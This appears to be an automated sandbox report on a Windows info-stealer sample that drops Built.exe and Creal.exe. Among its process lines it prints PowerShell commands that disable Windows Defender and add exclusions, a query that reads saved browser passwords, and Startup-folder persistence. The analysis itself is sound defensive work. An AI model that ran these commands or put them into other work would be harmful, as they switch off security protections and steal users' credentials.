              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD9359117C4_2_00007FFD9359117C
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD93591B544_2_00007FFD93591B54
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD9360AC804_2_00007FFD9360AC80
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD93591CBC4_2_00007FFD93591CBC
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD9359149C4_2_00007FFD9359149C
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD93B690604_2_00007FFD93B69060
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD948A59204_2_00007FFD948A5920
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFDA33EBBA04_2_00007FFDA33EBBA0
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFDA33E8D644_2_00007FFDA33E8D64
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFDA33E86604_2_00007FFDA33E8660
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFDA33E9A7C4_2_00007FFDA33E9A7C
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFDA33E9E744_2_00007FFDA33E9E74
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFDA33E53244_2_00007FFDA33E5324
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFDA33E5AF84_2_00007FFDA33E5AF8
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFDA34109004_2_00007FFDA3410900
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFDA34CB3C04_2_00007FFDA34CB3C0
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFDA34C64304_2_00007FFDA34C6430
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFDA34AA4304_2_00007FFDA34AA430
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFDA34874204_2_00007FFDA3487420
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFDA34E44404_2_00007FFDA34E4440
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFDA34232D54_2_00007FFDA34232D5
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFDA34392604_2_00007FFDA3439260
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFDA34D82604_2_00007FFDA34D8260
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFDA343C3304_2_00007FFDA343C330
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFDA344D2F04_2_00007FFDA344D2F0
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFDA344F2E04_2_00007FFDA344F2E0
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFDA34273164_2_00007FFDA3427316
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFDA34CE1704_2_00007FFDA34CE170
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFDA34321904_2_00007FFDA3432190
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFDA34D51804_2_00007FFDA34D5180
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFDA34AE2204_2_00007FFDA34AE220
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFDA343D2504_2_00007FFDA343D250
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFDA34C71F04_2_00007FFDA34C71F0
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFDA34422104_2_00007FFDA3442210
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFDA34AC0F04_2_00007FFDA34AC0F0
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFDA34241004_2_00007FFDA3424100
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFDA34A87D04_2_00007FFDA34A87D0
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFDA34807904_2_00007FFDA3480790
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFDA342A8504_2_00007FFDA342A850
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFDA34D98504_2_00007FFDA34D9850
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFDA34248004_2_00007FFDA3424800
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFDA347B6704_2_00007FFDA347B670
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFDA347E7404_2_00007FFDA347E740
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFDA34515A04_2_00007FFDA34515A0
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFDA344E5A04_2_00007FFDA344E5A0
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFDA34445604_2_00007FFDA3444560
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFDA34C56304_2_00007FFDA34C5630
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFDA34C75F04_2_00007FFDA34C75F0
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFDA34336004_2_00007FFDA3433600
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFDA34CA4A04_2_00007FFDA34CA4A0
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFDA34294C04_2_00007FFDA34294C0
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFDA34D74704_2_00007FFDA34D7470
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFDA34944804_2_00007FFDA3494480
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFDA34245504_2_00007FFDA3424550
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFDA346A5404_2_00007FFDA346A540
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFDA348BBD04_2_00007FFDA348BBD0
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFDA3429B804_2_00007FFDA3429B80
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFDA343CBF04_2_00007FFDA343CBF0
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFDA3423BF04_2_00007FFDA3423BF0
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFDA3484BF04_2_00007FFDA3484BF0
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFDA3476C104_2_00007FFDA3476C10
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFDA34D8A804_2_00007FFDA34D8A80
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFDA342F9A04_2_00007FFDA342F9A0
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFDA34499804_2_00007FFDA3449980
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFDA3482A204_2_00007FFDA3482A20
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFDA34D1A404_2_00007FFDA34D1A40
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFDA34DA9F04_2_00007FFDA34DA9F0
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFDA34928B64_2_00007FFDA34928B6
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFDA342286E4_2_00007FFDA342286E
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFDA34978604_2_00007FFDA3497860
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFDA34658904_2_00007FFDA3465890
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFDA34368E04_2_00007FFDA34368E0
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFDA348C9104_2_00007FFDA348C910
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFDA349D0304_2_00007FFDA349D030
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFDA34470204_2_00007FFDA3447020
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFDA34BCFF04_2_00007FFDA34BCFF0
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFDA34480004_2_00007FFDA3448000
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFDA3464E804_2_00007FFDA3464E80
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFDA34B8DD04_2_00007FFDA34B8DD0
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFDA34AADD04_2_00007FFDA34AADD0
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFDA3430D704_2_00007FFDA3430D70
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FF6D92669645_2_00007FF6D9266964
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FF6D92410005_2_00007FF6D9241000
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FF6D925DA5C5_2_00007FF6D925DA5C
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FF6D924A2DB5_2_00007FF6D924A2DB
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FF6D92521645_2_00007FF6D9252164
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FF6D92519445_2_00007FF6D9251944
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FF6D92539A45_2_00007FF6D92539A4
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FF6D92489E05_2_00007FF6D92489E0
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FF6D924A4745_2_00007FF6D924A474
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FF6D924ACAD5_2_00007FF6D924ACAD
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FF6D9255D305_2_00007FF6D9255D30
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FF6D9251B505_2_00007FF6D9251B50
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FF6D92664185_2_00007FF6D9266418
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FF6D92608C85_2_00007FF6D92608C8
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FF6D9252C105_2_00007FF6D9252C10
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FF6D9263C105_2_00007FF6D9263C10
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FF6D9265C005_2_00007FF6D9265C00
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FF6D9259EA05_2_00007FF6D9259EA0
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FF6D9265E7C5_2_00007FF6D9265E7C
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FF6D925DEF05_2_00007FF6D925DEF0
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FF6D92697285_2_00007FF6D9269728
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FF6D925E5705_2_00007FF6D925E570
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FF6D9251D545_2_00007FF6D9251D54
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FF6D92535A05_2_00007FF6D92535A0
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FF6D92618745_2_00007FF6D9261874
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FF6D92640AC5_2_00007FF6D92640AC
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FF6D92580E45_2_00007FF6D92580E4
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FF6D92608C85_2_00007FF6D92608C8
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FF6D9251F605_2_00007FF6D9251F60
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FF6D92517405_2_00007FF6D9251740
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FF6D92587945_2_00007FF6D9258794
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FF6D92498005_2_00007FF6D9249800
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89A223E05_2_00007FFD89A223E0
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89A21FB05_2_00007FFD89A21FB0
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89A348105_2_00007FFD89A34810
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89A345C05_2_00007FFD89A345C0
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89A424905_2_00007FFD89A42490
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89A41D705_2_00007FFD89A41D70
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89A41FE05_2_00007FFD89A41FE0
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89A429B05_2_00007FFD89A429B0
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89A42EB05_2_00007FFD89A42EB0
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89A435205_2_00007FFD89A43520
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89A51D305_2_00007FFD89A51D30
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89A521205_2_00007FFD89A52120
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89A61F005_2_00007FFD89A61F00
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89A621E05_2_00007FFD89A621E0
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89A81F805_2_00007FFD89A81F80
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89A923805_2_00007FFD89A92380
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89A922705_2_00007FFD89A92270
              Source: unicodedata.pyd.2.dr | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
              Source: _overlapped.pyd.2.dr | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
              Source: rar.exe.3.dr | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
              Source: unicodedata.pyd.3.dr | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
              Source: unicodedata.pyd.24.dr | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
              Source: _overlapped.pyd.24.dr | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
              Source: python3.dll.24.dr | Static PE information: No import functions for PE file found
              Source: python3.dll.2.dr | Static PE information: No import functions for PE file found
              Source: libcrypto-3.dll.3.dr | Static PE information: Section: UPX1 ZLIB complexity 0.9991990186771459
              Source: libssl-3.dll.3.dr | Static PE information: Section: UPX1 ZLIB complexity 0.9923211348684211
              Source: python312.dll.3.dr | Static PE information: Section: UPX1 ZLIB complexity 0.9993225025765606
              Source: sqlite3.dll.3.dr | Static PE information: Section: UPX1 ZLIB complexity 0.9973947832661291
              Source: unicodedata.pyd.3.dr | Static PE information: Section: UPX1 ZLIB complexity 0.9935825892857143
              Source: classification engine | Classification label: mal100.troj.adwa.spyw.evad.winEXE@45/226@6/6
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exe | Code function: 0_2_00007FF606383BF8 GetLastError, FormatMessageW, LocalFree
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exe | Code function: 0_2_00007FF60639C260 FindResourceExW, SizeofResource, LoadResource, LockResource, GlobalAlloc, GlobalLock, CreateStreamOnHGlobal, GdipCreateHBITMAPFromBitmap, GlobalUnlock, GlobalFree
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exe | File created: C:\Users\user\Desktop\__tmp_rar_sfx_access_check_5019218
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5200:120:WilError_03
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1396:120:WilError_03
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6404:120:WilError_03
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2792:120:WilError_03
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3224:120:WilError_03
              Source: C:\Users\user\Desktop\Built.exe | Mutant created: \Sessions\1\BaseNamedObjects\Z
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6236:120:WilError_03
              Source: C:\Users\user\Desktop\Creal.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI56762
              Source: #U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exe | File read: C:\Windows\win.ini
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: Built.exe, 00000004.00000002.2198401846.00007FFDA3421000.00000040.00000001.01000000.00000012.sdmp | Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
              Source: Creal.exe, 00000005.00000002.2425292105.00000203E8110000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: SELECT action_url, username_value, password_value FROM logins;
              Source: Built.exe, Built.exe, 00000004.00000002.2198401846.00007FFDA3421000.00000040.00000001.01000000.00000012.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
              Source: Built.exe, Built.exe, 00000004.00000002.2198401846.00007FFDA3421000.00000040.00000001.01000000.00000012.sdmp | Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
              Source: Built.exe, Built.exe, 00000004.00000002.2198401846.00007FFDA3421000.00000040.00000001.01000000.00000012.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
              Source: Built.exe, Built.exe, 00000004.00000002.2198401846.00007FFDA3421000.00000040.00000001.01000000.00000012.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
              Source: Built.exe, Built.exe, 00000004.00000002.2198401846.00007FFDA3421000.00000040.00000001.01000000.00000012.sdmp, Creal.exe | Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
              Source: Built.exe, Built.exe, 00000004.00000002.2198401846.00007FFDA3421000.00000040.00000001.01000000.00000012.sdmp | Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
              Source: #U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exe | ReversingLabs: Detection: 31%
              Source: Built.exe | String found in binary or memory: id-cmc-addExtensions
              Source: Built.exe | String found in binary or memory: set-addPolicy
              Source: Built.exe | String found in binary or memory: can't send non-None value to a just-started coroutine
              Source: Built.exe | String found in binary or memory: --help
              Source: Built.exe | String found in binary or memory: can't send non-None value to a just-started generator
              Source: Built.exe | String found in binary or memory: can't send non-None value to a just-started async generator
              Source: Built.exe | String found in binary or memory: OINT: if this variable is set to 0, it disables the default debugger. It can be set to the callable of your debugger of choice. These variables have equivalent command-line options (see --help for details): PYTHONDEBUG
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exe | File read: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exe
              Source: unknown | Process created: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exe "C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exe"
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exe | Process created: C:\Users\user\Desktop\Creal.exe "C:\Users\user\Desktop\Creal.exe"
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exe | Process created: C:\Users\user\Desktop\Built.exe "C:\Users\user\Desktop\Built.exe"
              Source: C:\Users\user\Desktop\Built.exe | Process created: C:\Users\user\Desktop\Built.exe "C:\Users\user\Desktop\Built.exe"
              Source: C:\Users\user\Desktop\Creal.exe | Process created: C:\Users\user\Desktop\Creal.exe "C:\Users\user\Desktop\Creal.exe"
              Source: C:\Users\user\Desktop\Built.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Built.exe'"
              Source: C:\Users\user\Desktop\Built.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Built.exe'
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Users\user\Desktop\Built.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\Built.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Users\user\Desktop\Creal.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl ifconfig.me"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\curl.exe curl ifconfig.me
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
              Source: unknown | Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe"
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe | Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe"
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl ifconfig.me"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\curl.exe curl ifconfig.me
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeSection loaded: dxgidebug.dllJump to behavior
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeSection loaded: riched20.dllJump to behavior
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeSection loaded: usp10.dllJump to behavior
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeSection loaded: msls31.dllJump to behavior
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeSection loaded: windowscodecs.dllJump to behavior
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeSection loaded: netutils.dllJump to behavior
